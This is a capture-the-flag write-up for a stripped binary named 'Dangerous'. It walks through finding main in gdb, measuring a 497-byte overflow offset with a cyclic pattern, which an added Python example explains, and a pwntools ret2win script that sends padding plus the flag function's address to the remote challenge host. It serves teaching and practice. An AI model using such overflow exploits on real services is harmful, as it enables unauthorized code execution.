# Dangerous

The binary is stripped of symbols, and even radare2 cannot resolve main, so this is a little difficult.

I stepped through `__libc_start_main` in gdb until the `call rax` instruction.

At this point, rax was 0x4011d6, which tells us that this is the address of main. I used `x/100i` to view the instructions from there, and found a small buffer overflow.

Using pattern.py, we find that the offset to the return address is 497.
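To show what pattern.py is doing when it reports that offset, here is an added example (not code from the writeup) that builds the same kind of cyclic de Bruijn pattern pwntools' `cyclic()` produces, and maps a 4-byte window, or the register value that window ended up in, back to its position in the input. The 600-byte length and the offset-497 register value are constructed for the demonstration; the function names are mine.

```python
import string

ALPHABET = string.ascii_lowercase  # same alphabet pattern.py / pwntools cyclic() use
SUBSEQ_LEN = 4                      # every 4-byte window of the pattern is unique


def cyclic_pattern(length, alphabet=ALPHABET, n=SUBSEQ_LEN):
    """Return the first `length` characters of the de Bruijn sequence B(k, n).

    Every window of n characters occurs at most once (for length < k**n), so
    the bytes that land in a register after a crash identify exactly one
    offset in the input.  Standard FKM construction, stopped early.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:          # we only need a prefix, so stop early
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(out[:length])


def find_offset(pattern, needle):
    """Return the offset of `needle` (one n-character window) inside `pattern`."""
    if len(needle) != SUBSEQ_LEN:
        raise ValueError(f"needle must be {SUBSEQ_LEN} characters long")
    off = pattern.find(needle)
    if off < 0:
        raise ValueError("window not found: pattern too short or wrong alphabet")
    return off


def offset_from_register(pattern, reg_value, word_bytes=8):
    """Given the integer a 64-bit register held at the crash, find the offset
    in the input that those bytes came from (little-endian, first 4 bytes)."""
    raw = reg_value.to_bytes(word_bytes, "little")
    return find_offset(pattern, raw[:SUBSEQ_LEN].decode("ascii"))


if __name__ == "__main__":
    pat = cyclic_pattern(600)
    # Constructed example: suppose the saved return address was overwritten
    # with the 8 pattern bytes that sit at offset 497.
    fake_rip = int.from_bytes(pat[497:505].encode(), "little")
    print(offset_from_register(pat, fake_rip))  # 497
```

Feeding `cyclic_pattern(600)` to the binary and reading the value that ended up in the return slot is exactly the measurement the writeup describes; `offset_from_register` turns that value back into 497 because no 4-byte window repeats anywhere in the first 26**4 characters of the sequence.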

Looking a little past main, there appears to be another function. It calls open, then read, then puts.

Working out the string address relative to RIP and examining it with `x/s`, we find that it calls open on `flag.txt`! This must be the flag function.

Essentially, we have a simple ret2win exploit. Overwrite ret address with the flag function.

```python
from pwn import *

NUM_TO_RET = 497        # offset from the start of the buffer to the saved return address (from pattern.py)
flag = 0x401312         # address of the flag function found past main in gdb
padding = b'A' * NUM_TO_RET

#p = process("./dangerous")
p = remote("jh2i.com", 50011)
# flat() packs the flag address as a little-endian 64-bit word after the padding
p.sendline(flat(padding, flag, word_size=64))
p.interactive()
```

